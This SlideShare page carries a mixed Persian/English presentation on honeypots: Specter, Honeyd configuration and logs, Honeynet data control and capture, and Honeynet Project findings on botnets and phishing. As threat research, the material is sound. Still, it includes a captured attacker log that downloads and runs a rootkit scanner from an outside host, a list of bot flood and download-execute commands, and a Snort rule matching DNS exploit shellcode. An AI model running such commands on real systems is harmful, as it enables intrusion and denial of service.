• Save
Honeynet Project View
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
3,329
On Slideshare
3,221
From Embeds
108
Number of Embeds
11

Actions

Shares
Downloads
2
Comments
0
Likes
5

Embeds 108

http://tahoorak.blogspot.com 80
http://www.slideshare.net 7
http://tahoorak.blogspot.ru 6
http://tahoorak.blogspot.de 4
http://tahoorak.blogspot.fr 3
http://tahoorak.blogspot.co.uk 3
http://tahoorak.blogspot.com.es 1
http://www.slashdocs.com 1
http://www.tahoorak.blogspot.com 1
http://tahoorak.blogspot.tw 1
http://tahoorak.blogspot.nl 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Even more exciting is the ability to disable attacks by modifying the packet payload. Here we disable the DNS attack by replacing the exploit code with different values. Even if the exploit is successful, they will end up executing /ben/sh, which does not exist on any system. This creates a more realistic environment for attackers. They launch an attack and the victim responds, however the attack fails. The attacker most likely never know why it failed. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • This is the agenda we will be following for today. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Keep in mind this statistical information was gathered during 2000-2001. We fully believe that the threats on the Internet are exponentially more active due to the release of highly automated tools, such as worms and auto-rooters. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • We believe this to be a Romanian blackhat that lives on the east coast. His handle is thought to be ‘Johnny17’. The Honeynet Project captured this real time video as one of our Honeynets was under attack. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • After one of our Honeynets was compromised with the dtspcd exploit, the system was used for the attackers to communicate with each other. This was part of their conversation. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Honeynets can detect activity on any protocol, increasing their chances of detecting previously unknown attacks. For example, a Honeynet was recently compromised and a backdoor was placed on the system. The backdoor used encoded IP protocol 11 packets for communication. This is a covert channel between the hacker and the compromised system. The Honeynet detected and captured this anomalous traffic and allowed us to analyze the attacker’s actions. Above we see the encoded covert communications sent by the attacker to the honeypot. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  • Feel free to contact the Honeynet Project with any idea, questions, or concerns you may have. If you are interested in learning more about information security in general, you can find books written by member of the Honeynet Project at http://www.honeynet.org/book/books.html Best of luck! --- The Honeynet Project --- Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)

Transcript

  • 1. Honeypot New technology for the security community By Tahoora Ketabdar
  • 2. Honeypots
    • تعريف : يك Honeypot را يك Information system resource
    • ( منبع سيستم اطلاعاتي ) به شمار آورده اند كه ارزش و مقادير ان وابسته به منابع بدون مجوز و غير قانوني است (Unauthorized)
    • Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise.
    • Primary value to most organizations is information .
  • 3. IDS
  • 4. Advantages
    • Collect small data sets of high value .( 1GB 1MB )
    • Reduce false positives( 10,000 10 )
    • Catch new attacks, false negatives ( encoded back door commands -non Standard IP protocol )
    • Work in encrypted or IPv6 environments
    • Simple concept requiring minimal resources .
  • 5. Disadvantages
    • • Limited field of view (microscope)
    • Honeypots تنها مي توانند تحركاتي را دنبال و شناسايي كنند كه مستقيما با خودشان درگير گردنند . بعبارتي قادر نيستند حملات به ساير سيستم ها را گير بيندازند تا زماني كه نفوذگر با خود Honeypot وارد رويارويي شود .
    • Risk (mainly high-interaction honeypots)
  • 6. Types
    • Low-interaction
      • Emulates services, applications, and OS’s.
      • Low risk and easy to deploy/maintain, but capture limited information.
    • High-interaction
      • Real services, applications, and OS’s
      • Capture extensive information, but high risk and time intensive to maintain.
  • 7. Examples of Honeypots
    • BackOfficer Friendly
    • KFSensor(Specter)
    • Honeyd
    • Honeynets
    Low Interaction High Interaction
  • 8. قابليت هاي Honeypots
    • اهداف توليدي
    • * جلوگيري،تشخيص و ياري رساندن به سازمان براي پاسخگويي به حمله است .
    • Honeypots* بادرجه تعامل كم
    • Sticky Honeypot : آهسته كردن روند اسكن شبكه را از طريق شگردهاي TCP گوناگوني مانند Windows size zero يا گير انداختن نفوذگر در يك الگوي كنترل شده بوسيله خود،انجام ميدهد . LaBrea Tarpit
    • اهداف تحقيقاتي
    • بيشتر جهت جمع آوري اطلاعات مانند آناليز روند حملات ،شناسايي ابزارها و روش هاي جديد حمله،هويت نفوذگر و اجتماعات آن ها و نيز اخطار زودهنگام يا پيش بيني و انگيزه هاي يك حمله
  • 9. Specter
    • قابليت اوليه و اصلي توانايي تشخيص
    • محصولي تجاري و براي محيط ويندوز
    • Honeypot هاي با درجهً تعامل كم
    • يك قطعه كد نرم افزاري است كه روي كامپيوترتان مانند ساير برنامه هاي كاربردي Microsoft Office و يا Winamp نصب ميكنيد .
    • آدرس هاي IP اختصاص يافته به سيستم هاي شبكه را مانيتور كرده و بر خلاف ساير Honeypot ها قادر به مانيتور فضاي IP استفاده نشده نيست
    • شنود سرويس هاي TCP (14 پورت TCP )
    • توانايي تشخيص ICMP,UDP يا ساير ترافيك هاي IP غير استاندارد را ندارد .( IPSec,SSh,.... )
  • 10. ليست پورت هاي تحت نظارت Specter شنود پورت . وقتي اتصالي به وسيله نفوذگر برقرار شد،اين اتصال مختوم (Terminate) شده و اطلاعات مربوط به آن log مي گردد .
    • كاملا با نفوذگر وارد محاوره مي شوند و برنامه كاربردي را اميوليت ميكنند .
    • سرويس HTTP يك وب سرور
    • سرور FTP اميوليت شده
  • 11. Specter تا سقف 17 سيستم عامل رامي تواند اميوليت كند
    • يك محدوديت در مورد اميوليت سيستم عامل وجدود دارد و آن اينكه عمل اميوليت در سطح IP Stack انجام نمي شود . يعني اگر سيستم سولاريس را تقليد نموديد، Honeypot شما همچنان بسته مربوط به سيستم ويندوز را داراست . به طور دقيق تر IP Stack همان نوع از سيستم عامل ويندوزيي كه بر روي Honeypot خود نصب كرده ايد .
    • نفوذگر از ابزارهاي FingerPrinting مانند Nmap معروف، براي تعيين سيستم عامل هدف استفاده مي كند . يعني اگر چه شما قصد داريد Apache و وب سرور FTP سولاريس را نشان دهيد، اما Stack IP شما مربوط به ويندوز باقي مي ماند
  • 12. Specter Service's personality
    • Open :
    • سرور FTP ،به صورت Open و Anonymous رفتار كند
    • ) (ID: Anonymous & )with no need for password
    • سرويس SMTP داشته باشيد و به شكل Open Relay عمل كند و براي جذب Spammer كه به دنبال Mail Relay ميگردند
    • Person who sends "junk" e-mail messages
    • Secure :
    • سرويس FTP اجازه ورود آزادانه را نمي دهد و سرويس SMTP ديگربه شكل Mail Relay نخواهد بود .
    • Aggressive :
    • اتصال را خاتمه داده و پيام اخطاري به نفوذگر مي دهد كه فعاليت او شناسايي شده و به اطلاع سازمان رسيده است . اين روش براي ترساندن نفوذگر بسيار مناسب است .
  • 13. Intelligence gathering by specter
    • زماني كه نفوذگري به Honeypot رخنه كند، Specter مي تواند اطلاعات مفيد را طبق انتخاب شما و از طريق پرس وجوي مداوم سيستم نفوذگر به شما بازگرداند . اين انتخاب ها شامل توانايي اسكن، Finger و Traceroute سيستم نفوذگر از راه دور است .
    • Querying
  • 14. Snapshot of the Specter GUI Alert box هر حمله اي كه رخ داد ليست ميشود Status Personality Remote log intelligence gathering help
  • 15. someone scanning for and logging into anonymous FTP servers
    • short alerts
    • long alert
  • 16. از Windows version of Snort مي توان در كنار Specter بهره برد
    • تمامي بسته و payload آن را نيز در فرمت باينري ضبط كند
    • Snort به ساير پورت هايي كه به وسيله Specter شنود نمي شود و نيز ساير پروتكل هاي كه پشتيباني نمي كند نيز گوش داده و فغاليت روي آن ها را log ميكند .
  • 17. Honeyd specification
    • It's designed to be used on Unix-based operating systems, such as OpenBSD or Linux
    • OpenSource
    • can monitor all of unused IPs at the same time
    • only generate 5 or 10 alerts a day
    • can detect (and log) any activity on any UDP or TCP port, as well as some ICMP activity
    • it not only detects known attacks, but unknown ones as well.
  • 18.  
  • 19.
    • Honeyd به طور مستقل توانايي هدايت حمله نفوذها را به خود ندارد وتنها قادر است با نفوذگر به تعامل بپردازد .
    • Arpd ، براي عمل Arp Spoofing استفاده مي شود
    • arpd 192.168.1.0/24
    • honeyd - p nmap.prints - f honeyd.conf 192.168.1.0/24
    •  
  • 20. فايل پيكربندي Honeyd
    • ## Honeyd configuration file
    • ##### Windows computers (default)
    • create default
    • set default personality " Windows NT 4.0 Server SP5-SP6 “
    • set default default tcp action reset
    • add default tcp port 110 "sh scripts/pop.sh“
    • add default tcp port 80 "perl scripts/iis-0.95/main.pl“
    • add default tcp port 25 block
    • add default tcp port 21 "sh scripts/ftp.sh“
    • add default tcp port 22 proxy $ipsrc:22
    • add default udp port 139 drop
    • set default uptime 3284460
    • ### Cisco router
    • create router
    • set router personality " Cisco 4500-M running IOS 11.3(6) IP Plus “
    • add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl“
    • set router default tcp action reset
    • set router uid 32767 gid 32767
    • set router uptime 1327650
    • # Bind specific templates to specific IP address
    • # If not bound, default to Windows template
    • bind 192.168.1.150 router
  • 21.
    • Honeyd هر چيزي را كه در سر راهش ظاهر شود شناسايي مي كند و نه تنها حملات IIS شناخته شده را بلكه نفوذ بوسيله RPC كه زماني ناشناخته بود را نيز شناسايي ميكند .
    • سرويس RPC روشي براي توسعه سيستمها و سرويس دهندهاي توزيع شده در شبكه محسوب مي شود . با استفاده از اين سرويس ،برنامه نويس مي تواند در بخشي از برنامه خود يك پروسيجر را از روي سرويس دهنده RPC در شبكه فراخواني كند و منتظر بماند تا نتيجه اين فراخواني بازگردد . يعني بخشي از كد اجرائي بروي سرويس دهنده RPC اجرا شود . بسياري از شركت هاي توسعه نرم افزار برنامه هاي كاربردي بسياري مبتني بر سرويس RPC عرضه كرده اند
    • Remote Procedure Call : سرويسي كه آمار مربوط به كارائي هسته سرويس دهند را ارائه ميدهد
    • Rwalld : سرويسي كه اجازه مي دهد به كاربران حاضر در سيستم،پيام هايي ارسال شود .
    • Rup : سرويسي كه زمان فعلي و متوسط بار سرويس دهنده را عرضه مي كند .
    • متاسفانه بسياري از سرويس هاي RPC با نقاط ضعف فراوان عرضه شده اند . دانستن سرويس هاي RPC ارئه شده در يك ماشين ،اطلاعات مفيدي براي نفوذگر محسوب مي شود .
    • نرم افزار پويشگر براي كشف سرويس هاي RPC ،يكسري دستورات پوچ به سمت پورت هاي باز يك ماشين ارسال مي كنند . پاسخي كه از اين پورت ها باز مي گردد تعيين كننده نوع سرويس RPC اجرا شده روي آن ماشين است . اگر يك سرويس دهنده RPC روي يك ماشين كشف شود،نفوذگر سعي مي كند با رخنه در آن،ماشين مربوطه را تحت كنترل خود درآورد .
    • روش رخنه در سرويس دهنده RPC ،ارسال كد هاي Exploit به منظور در هم شكستن پشته و در اختيار گرفتن كنترل آن است Sniffer
    • كدهايي كه با ارسال آن ها به يك پروسه سرويس دهنده،آن را مختل كرده و در هم مي شكند و كنترل آن را در اختيار نفوذگر قرار ميدهد
  • 22. فراخواني يك برنامه RPC
  • 23.
    • / var/log/messages
    • /var/log/messages
    • Feb 12 23:06:33 laptop honeyd[30948]: Connection to closed port: udp (210.35.128.1:1978 - 192.168.1.101:1978)
    • Feb 12 23:23:40 laptop honeyd[30948]: Connection request: tcp (66.136.92.78:3269 - 192.168.1.102:25)
    • Feb 12 23:23:40 laptop honeyd[30948]: Connection established : tcp (66.136.92.78:3269 - 192.168.1.102:25) <-> sh scripts/smtp.sh
    • Feb 12 23:24:14 laptop honeyd[30948]: Connection dropped with reset: tcp (66.136.92.78:3269 - 192.168.1.102:25)
    • Feb 12 23:34:53 laptop honeyd[30948]: Killing attempted connection: tcp (216.237.78.227:3297 - 192.168.1.102:80)
    • Feb 12 23:39:14 laptop honeyd[30948]: Connection: udp (10.5.5.71:1026-192.168.1.101:137)
    • Feb 12 23:39:14 laptop honeyd[30948]: Connection established: udp ( 10.5.5.71:1026 - 192.168.1.101:137)
    •   /tmp/honeyd/smtp-.log
    • Wed Feb 12 23:23:40 UTC 2003: SMTP started from PortEHLO relay.verizon.netMAIL From:
    • RCPT To:
  • 24. Passive Fingerprinting IP Packet
  • 25. TCP Segment
  • 26. 04/20-21:41:48.129662 129.142.224.3:659 -> 172.16.1.107:604 TCP TTL:45 TOS:0x0 ID:56257 ***F**A* Seq: 0x9DD90553 Ack: 0xE3C65D7 Win: 0x7D78
    • TTL: 45
    • Window Size: 0x7D78 (or 32120 in decimal)
    • DF: The Don't Fragment bit is set
    • TOS: 0x0
    • Window Size پيش فرض براي سيستم لينوكس
    • بيشتر سيستم ها بيت مربوط به DF را Set مي كنند . اندك سيستم هايي مانند SCO و OpenBSD از فلگ DF استفاده نمي كنند
    • پيش فرض بسته براي TTL عدد 64
    Linux Kernel 2.2X
  • 27. Honeynets
    • High-interaction honeypot designed to capture in-depth information .
    • Information has different value to different organizations.
    • Its an architecture you populate with live systems, not a product or software.
    • Any traffic entering or leaving is suspect.
  • 28. How it works
    • A highly controlled network where every packet entering or leaving is monitored , captured , and analyzed .
      • Data Control(NIDS,CC,Snort-Inline)
      • Data Capture(Sebek)
      • Data Analysis(walleye)
      • Alerting(Swatch)
  • 29. Honeynet Architecture
  • 30. Data Control
    • Mitigate risk of honeynet being used to harm non-honeynet systems.
    • Count outbound connections .( rc.firewall)
    • ### Set the connection outbound limits for different protocols. SCALE=&quot;day&quot; TCPRATE=&quot;15&quot; UDPRATE=&quot;20&quot; ICMPRATE=&quot;50&quot; OTHERRATE=&quot;15&quot;
    • NIPS (Snort-Inline): ابزاري به نام Snort Config اسكريپتي انعطاف پذير است كه قوانين استاندارد در Snort را به قابليت هاي مورد نياز Snort-Inline
    • Bandwidth Throttling *
  • 31. NIDS
  • 32. No Data Control
  • 33. Data Control
  • 34. Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; replace: &quot;| 0000 E8D7 FFFFFF|/ ben/sh &quot;;)
  • 35. Data Capture
    • Capture all activity at a variety of levels.
    • Network activity.
    • Application activity.
    • System activity.
  • 36. Sebek
    • Hidden kernel module that captures all host activity
    • Dumps activity to the network.
    • Attacker cannot sniff any traffic based on magic number and dst port.(UDP)
  • 37. Sebek Architecture
  • 38. Alerting
    • Swatch monitors log files for patterns described in a configuration file. When a pattern is found it can disseminate alerts via email, system bells, phone calls, and can be extended to run other commands/programs.
    • A simple Swatch rule contains the pattern to watch for followed by a list of actions to take. By default Swatch will include in email alerts the line in the log file that matched the given rule. An example email for the above rule would look like the example below.
    • To: admin@honeynet.org From: yourdatacontrol@yourdomain.org Subject: ------ ALERT!: OUTBOUND CONN --------
  • 39. Honeywall CDROM
    • Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
    • May, 2003 - Released Eeyore
    • May, 2005 - Released Roo
  • 40. Eeyore Problems
    • OS too minimized, almost led
    • . Could not easily add functionality.
    • Difficult to modify since LiveCD.
    • Limited distributed capabilities
    • No GUI administration
    • No Data Analysis
    • No international or SCSI support
  • 41. Roo Honeywall CDROM
    • Based on Fedora Core 3
    • Vastly improved hardware and international support.
    • Automated, headless installation
    • New Walleye interface for web based administration and data analysis.
    • Automated system updating.
  • 42. Installation
    • Just insert CDROM and boot, it installs to local hard drive.
    • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.
    • Following installation, you get a command prompt and system is ready to configure.
  • 43. First Boot
  • 44. Install
  • 45. Configure
  • 46. 3 Methods to Maintain
    • Command Line Interface
    • Dialog Interface
    • Web GUI ( Walleye )-
    • عیب آن هم عدم امکان دسترسی و استفاده از آن درمحل است و نیاز به یک کارت شبکه سوم دارید تا بتوانید بصورت از راه دور با Honey wall خود کار کنید
  • 47. Command Line Interface
    • Local or SSH access only.
    • Use the utility hwctl to modify configurations and restart services.
    • # hwctl HwTCPRATE=30
  • 48. Dialog Menu
  • 49. Data Administration
  • 50. Data Analysis
    • Most critical part, the purpose of a honeynet is to gather information and learn.
    • Need a method to analyze all the different elements of information.
    • Walleye is the new solution, comes with the CDROM.
  • 51. Walleye
  • 52. Data Analysis
  • 53. Data Analysis Flows
  • 54. Data Analysis Details
  • 55. Processes مي تواند تصوير گراف پروسه ها را نيز رسم كند
  • 56. Files
  • 57. Distributed Capabilities
  • 58. Honeynets and The Honeynet Project
  • 59.  
  • 60.  
  • 61. Purpose
    • To explain our organization, our value to you, and our research.
  • 62. Agenda
    • The Honeynet Project and Research Alliance
    • The Threat
    • How Honeynets Work
    • Learning More
  • 63. Honeynet Project
  • 64. Problem
    • How can we defend against an enemy, when we don’t even know who the enemy is?
  • 65. Mission Statement
    • To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned.
  • 66. Our Goal
    • Improve security of Internet at no cost to the public.
      • Awareness: Raise awareness of the threats that exist.
      • Information: For those already aware, we teach and inform about the threats.
      • Research: We give organizations the capabilities to learn more on their own.
  • 67. Honeynet Project
    • Non-profit (501c3) organization with Board of Directors.
    • Funded by sponsors
    • Global set of diverse skills and experiences.
    • Open Source, share all of our research and findings at no cost to the public.
    • Deploy networks around the world to be hacked.
    • Everything we capture is happening in the wild.
    • We have nothing to sell.
  • 68. Honeynet Research Alliance
    • Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies.
    • http://www.honeynet.org/alliance/
  • 69. Alliance Members
    • South Florida Honeynet Project
    • Georgia Technical Institute
    • Azusa Pacific University
    • USMA Honeynet Project
    • Pakistan Honeynet Project
    • Paladion Networks Honeynet Project (India)
    • Internet Systematics Lab Honeynet Project (Greece)
    • Honeynet.BR (Brazil)
    • UK Honeynet
    • French Honeynet Project
    • Italian Honeynet Project
    • Portugal Honeynet Project
    • German Honeynet Project
    • Spanish Honeynet Project
    • Singapore Honeynet Project
    • China Honeynet Project
  • 70. The Threat
  • 71. What we have captured
    • The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
    • Little has yet to be captured on advanced threats, few honeynets to date have been designed to capture them.
  • 72. The Threat
    • Hundreds of scans a day.
    • Fastest time honeypot manually compromised, 15 minutes (worm, under 60 seconds).
    • Life expectancies: vulnerable Win32 system is under three hours, vulnerable Linux system is three months.
    • Primarily cyber-crime, focus on Win32 systems and their users.
    • Attackers can control thousands of systems (Botnets).
  • 73. The Threat
  • 74. The Motive
    • Motives vary, but we are seeing more and more criminally motivated.
    • Several years ago, hackers hacked computers. Now, criminals hack computers.
    • Fraud, extortion and identity theft have been around for centuries, the net just makes it easier.
  • 75. DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: &quot;give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
  • 76. The Target
    • The mass users.
    • Tend to be non-security aware, making them easy targets.
    • Economies of scale (it’s a global target).
  • 77. Interesting Trends
    • Attacks often originate from economically depressed countries (Romania is an example).
    • Attacks shifting from the computer to the user (computers getting harder to hack).
    • Attackers continue to get more sophisticated.
  • 78. The Tools
    • Attacks used to be primarily worms and autorooters.
    • New advances include Botnets and Phishing.
    • Tools are constantly advancing.
  • 79. The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
  • 80. Botnets
    • Large networks of hacked systems.
    • Often thousands, if not tens of thousands, of hacked systems under the control of a single user.
    • Automated commands used to control the ‘zombies’.
  • 81. How They Work
    • After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.
    • The binary is started, and connects to the hard-coded master IRC server.
    • Often a dynamic DNS name is provided rather than a hard coded IP address, so the bot can be easily relocated.
    • Using a special crafted nickname like USA|743634 the bot joins the master's channel, sometimes using a password to keep strangers out of the channel
  • 82. 80% of traffic
    • Port 445/TCP
    • Port 139/TCP
    • Port 135/TCP
    • Port 137/UDP
    • Infected systems most often WinXP-SP1 and Win2000
  • 83. Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
  • 84. Numbers
    • Over a 4 months period
      • More then 100 Botnets were tracked
      • One channel had over 200,000 IP addresses.
      • One computer was compromised by 16 Bots.
      • Estimate over 1 millions systems compromised.
  • 85. Botnet Economy
    • Botnets sold or for rent.
    • Saw Botnets being stolen from each other.
    • Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information.
  • 86. Phishing
    • Social engineer victims to give up valuable information (login, password, credit card number, etc).
    • Easier to hack the user then the computers.
    • Need attacks against instant messaging.
    • http://www.antiphishing.org
  • 87. The Sting
  • 88. Getting the Info
  • 89. Infrastructure
    • Attackers build network of thousands of hacked systems (often botnets).
    • Upload pre-made pkgs for Phishing.
    • Use platforms for sending out spoofed email.
    • Use platforms for false websites.
  • 90. A Phishing Rootkit
    • -rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
    • -rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
    • -rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
    • -rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
    • -rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
    • -rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
    • -rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
    • -rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
    • -rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
    • -rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
